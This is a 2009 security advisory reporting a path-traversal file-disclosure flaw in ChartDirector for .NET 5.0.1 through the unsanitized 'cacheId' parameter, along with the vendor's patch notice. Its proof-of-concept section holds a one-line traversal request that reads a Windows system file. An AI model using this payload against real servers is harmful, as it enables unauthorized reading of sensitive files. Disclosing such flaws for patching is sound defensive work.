1 ====================================================
2 Advisory No.: ISNSC−0910
3 =============
4 ChartDirector Critical File Access
5
6 Information
7 ======
8 Author: DokFLeed
9 Program Affected: http://www.chartdir.com for .NET
10 Version: 5.0.1
11 Severity: Critical.
12 Type of Advisory: Mid Disclosure.
13 Affected/Tested Versions: Random
14
15 Program Description
16 ==================
17 Widely used Chart Component on Financial & Stock Trading websites
18
19 Overview
20 =========
21 The query variable "cacheId=" is not sanitized, it will can allow critical files download
22
23 Proof Of Concept
24 ================
25 ?ChartDirectorChartImage=chart_WebChartViewer1&cacheId=/../../../../../../../../windows/win.ini
26
27 Solution/Fix
28 ============
29 Upgrade to latest Chart Dir or apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2):
30 http://www.advsofteng.com/netchartdir501p2.zip
31
32 Vendor Status
33 ============
34 The problem you mentions affect ChartDirector for .NET.
35 The current version of ChartDirector for .NET on our web site (Ver 5.0.2) already has this issue fixed. So this issue
no longer occurs with the current version of ChartDirector for .NET.
36 For people using earlier versions of ChartDirector, it is suggested they upgrade to the latest version. They may also
apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2):
37 http://www.advsofteng.com/netchartdir501p2.zip
38
39 Reference
40 ============
41 http://dokfleed.net/duh/modules.php?name=News&file=article&sid=48
42
43 # milw0rm.com [2009−09−09]
Page 1/1
ChartDirector 5.0.1 cacheId Arbitrary File Disclosure Vulnerability
DokFLeed
09/09/2009